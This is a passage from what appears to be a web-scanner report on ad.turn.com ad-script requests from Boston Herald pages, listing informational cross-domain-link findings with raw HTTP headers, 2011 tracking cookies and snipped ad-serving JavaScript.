OxoBcBgje0LDTAGcK0LbrjjUGkdS7-oV&acp=35600B7D7485C869&rtbacid=55ed4e5e03bf8e5477cfcd0039923902d2e38a03

The response contains the following link to another domain:

http://www.unicefusa.org/?utm_source=turn&utm_medium=display_ad&utm_campaign=haiti365&utm_content=728x90

Request

Response

17.85. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?&pub=6264177&code=14383608&cch=14381728&l=728x90&tmz=-6&area=0&res=1920&rnd=0.4859149551484734&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=7045426855259476565?
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;
http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;

Request

GET /server/ads.js?&pub=6264177&code=14383608&cch=14381728&l=728x90&tmz=-6&area=0&res=1920&rnd=0.4859149551484734&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=a23_XVoqSlKtCC-2lTx1mK8Atn0oO5LfCaNOF46MJQVh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKT4Z56e4E96NaNZjC_AOT217oTThsnNqViHEtNUDKqf-OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz59qajUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuAOwss-vu9H2Leed6bKEL9Ai4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; pf=P2ulGxJH0L6sP7i92CPecgAmiI2Lsig78fIY2fHGbzuJwV9kSIzX4BtZ7vBDkFqiEUMyLdhTUOk0HUHTgKulxX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sun, 30 Jan 2011 23:04:23 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=jD3N2bWA3-mOnaHNbq6oGr6gUOClkrpfUMKANQ1vhXPfaqaDzVRu9ZiuBStYaftYCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rgpegjWK4MWwom9unlgMhLXNsCCEbhAsIdsy3zCFGHpw37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJLf6A30j8d5gU8-mc72wOIKQrupC4PpJl2uCWF8C-Ug5zE4ga4uSsEjChAQfwWw36Y_OeXGaHeEWZpxqUmyoO4aEqzrlzsjMft3cRcjGnFvni7gawmV97meEG2o8pgUTMVUvCEsZdhQvkMaGDNXRUK841wLk2GYSRC0x3BEve4S431p3A6UMJjebe8drcGsyS5Eq2u8SK-4v0nTmoUt_kkk_bc2bQTBpOPgQ2rj-z4cSfohDo4-tul6_WuD8j0eMjE2VTyWMB9aQAFw797l12xcGDwUqNo5bwBfJavyMoCpVVDlIJowEL2ZJ7bbw_gCtmttGfpE3WazmTpUKWPgdm0Kwwwjl5KiXaen7PpuSxadNSxUp_78PaBWAnqowBUtUuPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6aKPrXTIbISjLdU8fmF4gcunvuhdFJQJil2xKmTz50dp7i0E4C4fIPULOO-1bgvNyH-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lAwi3YZykxvivNDVu_wiJ-nzpgcqiBETfVCgh6rOLqPGrJHyerevXy89jQMS63zyiKqQrupC4PpJl2uCWF8C-Ug7zI1PJlsg4JH93UKg4p8Y5067axWP77CNDdpZKPWLlSzacm4a-crF0dpacRlQXSurFgJILRn7aDAZTiRRTDpAMVUvCEsZdhQvkMaGDNXRUKxEQUIAYpp-QbAJrP1iB52HqzZ3gkHjNDLavV-i2IDmnKA5Q2hyGLZzy7yP9IhZH9vIPUpju1It7TH_4ufsTy9mfohDo4-tul6_WuD8j0eMjgn3JqGWHn99L8yAc1t0CrMGDwUqNo5bwBfJavyMoCpW5NWAkI-bj2WEMdrQi7smJSD2PyHt-rGJGOJ3lCDBJu6wwwjl5KiXaen7PpuSxadNrWfCFeAmfYB9wvbNyX_HcPveIf8j2XY661VgXz9vKr9c4SMN31V96MWZ_Nbkosfv4Z9eHEmOCw9cZ5JxzVrlAnvuhdFJQJil2xKmTz50dpwLpSN-3LiOu9Vp7WBoDgFL-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukLgWjDXsTUeTWd5tj4qNaDiJ4nBZ8RXPuIpJnusA91x86GC4mLEfJ2sljTHmzwZbAY_Lh2Ugi8mvJG633sZOiSP-EXc_UXFWP7mPaqhTNB2_pCu6kLg-kmXa4JYXwL5SDkn2PegxRqM5mRRNvuUuPQYa2L50HxvswuEv77HCRTvK8NG6w8lsq_gxT4zTpoxnW4XDDwtPU5vElBnBkAq9aTtVS8ISxl2FC-QxoYM1dFQrRidyFCOVEUccMTneL2wPB2akJ6Zxx4MaHG4qowJX52eEsNCVznntZWR3U7tjmpSZjO1tJ8qK8UAy-VKR7Q8r4Z-iEOjj626Xr9a4PyPR4yOY4aAiwQlqVTaDNmxm60K7wYPBSo2jlvAF8lq_IygKlaFm_ARvcAKoZH-AIv62HmLHlgdVIiUBy9FQ0RyPwh-_rDDCOXkqJdp6fs-m5LFp08ZtWn1dPsjZXR0HI6ZwQiQ-94h_yPZdjrrVWBfP28qvqcQn-qKG1Gb1Z9AhVjY5XByMOV9_koeB1I57EmsQtHqbnNLg8Qx7fq0wYdnvZy7Y32feEuljMvvhciAahuPk0P78DoTX-MltELREBCeeahnJarbE4M_xRXSdcI4iMbNNITjgnthAiWrbbf30tKcRFHS__DAzsh0vKgYK4DlknsYsTXzTIe6cvP8Fgp6v0iG1pCu6kLg-kmXa4JYXwL5SDnCxFISzUKJrnz8NWtmYNBgbnCbJPSsHs0iOvX6zYZZ441JwlocRM-1StCCQK60MTAivtkH0XcIkoBkuY7jUSFZVS8ISxl2FC-QxoYM1dFQrFMPrYvz2Ts1Ij_XSz-xv_NWGImt49pAB5RbCmhGeBVfK2_lUCO-ofMYaBVz1MsW3qBtHiSDSYD2cppR2YtGNYJ-iEOjj626Xr9a4PyPR4yPVhnlIkVgFWAUsSjI0os5awYPBSo2jlvAF8lq_IygKlcymYwSoiOeW4YEq5c_wtcPOvPQvhLJNbC2RmtNyUVddQ_F7c57KXIm9M4O-4Hye-wueocyz5z4Zh4_TTFn-uAowvSXZHGSyvtzgTZp8tkHW1Lph5MNqkh8XeX6MytKBTrzG1aXCqxVf5nZAA7HLfYwHFS74pGVX6R7fIB4_ENcKBxUu-KRlV-ke3yAePxDXCgcVLvikZVfpHt8gHj8Q1woHFS74pGVX6R7fIB4_ENcKkJ7WkZl4NM0k2bFXusY9VItRHAs1DGSp43CQgKuilTWLURwLNQxkqeNwkICropU1i1EcCzUMZKnjcJCAq6KVNe4dObEIMtKsHRmogbr3003uHTmxCDLSrB0ZqIG699NN7h05sQgy0qwdGaiBuvfTTe4dObEIMtKsHRmogbr3002Ul8WnhGx-5A8JgMe8wN1plJfFp4RsfuQPCYDHvMDdaTzS0erQLm3C2K0qtVlbCNOT8XToW0yxZ3rNQFHzVErUUFo10m1vdQ1esR0Vej5o2VBaNdJtb3UNXrEdFXo-aNlQWjXSbW91DV6xHRV6PmjZiM7S8Ta6ZVi8L44nt5Lbx_VtNJu5mSi-Do8DnZc8Z5lgZTgyDxl-p9HfhLxfMdBCgGuqQYTxk1W2ZXZk9Fbu2FD6CgQVbZgEbhsoT18Qyzhw7W5j5_klUHK2cIyCgrVuHA0g_1_zvhzGxm5cQYKDYoCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbbQ6QSLK4RiJR_RkawdJ2DWG8nWnpcW2PqfBIM0QT5xSvI67q-6Y9u6ozlXnWk2Vqae3zeygEkfAxz0LdLPYjcint83soBJHwMc9C3Sz2I3IE2wSFrg3YhUxrd13SPf4zdk0py110jTFeWakVDqJkX2L9hnORGvmj8mxjNocqMdc8PVvEcs62kDyw4j4Ti-ngvD1bxHLOtpA8sOI-E4vp4Lw9W8RyzraQPLDiPhOL6eC8PVvEcs62kDyw4j4Ti-ngur7bsp5Fvhi44QSuDqR21RI-fooknOV-tsJXjS2yRhbSPn6KJJzlfrbCV40tskYW0j5-iiSc5X62wleNLbJGFtI-fooknOV-tsJXjS2yRhbPg2v6FqwK2qGH2NT2HwC2T4Nr-hasCtqhh9jU9h8Atk-Da_oWrAraoYfY1PYfALZ9KcqOJj5P-El2YxOi1A-SJzgRA1_Lhfy9FvJaW7uwAuc4EQNfy4X8vRbyWlu7sALnOBEDX8uF_L0W8lpbu7ACykgbtzLVWjLpGASKeaSS94; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: pf=DDphSjcGk-rcs3g8uiJ3tdVnoSLgvd8DzizssL9FyFKJwV9kSIzX4BtZ7vBDkFqigSFYvDNduS7kxw0buCFgeX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 23:04:23 GMT
Content-Length: 10126

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
concept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n\n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...
888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/http://ad.doubleclick.net/jump/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=7045426855259476565?">\n<IMG SRC="http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=7045426855259476565?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.86. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?&pub=8024590&code=12929577&cch=12929478&l=300x250&tmz=-6&area=0&res=1920&rnd=0.03954016091302037&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome

The response contains the following link to another domain:

http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=9;w=300;h=250;q=turn

Request

GET /server/ads.js?&pub=8024590&code=12929577&cch=12929478&l=300x250&tmz=-6&area=0&res=1920&rnd=0.03954016091302037&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; adImpCount=a23_XVoqSlKtCC-2lTx1mK8Atn0oO5LfCaNOF46MJQVh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKT4Z56e4E96NaNZjC_AOT217oTThsnNqViHEtNUDKqf-OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz59qajUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuAOwss-vu9H2Leed6bKEL9Ai4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaS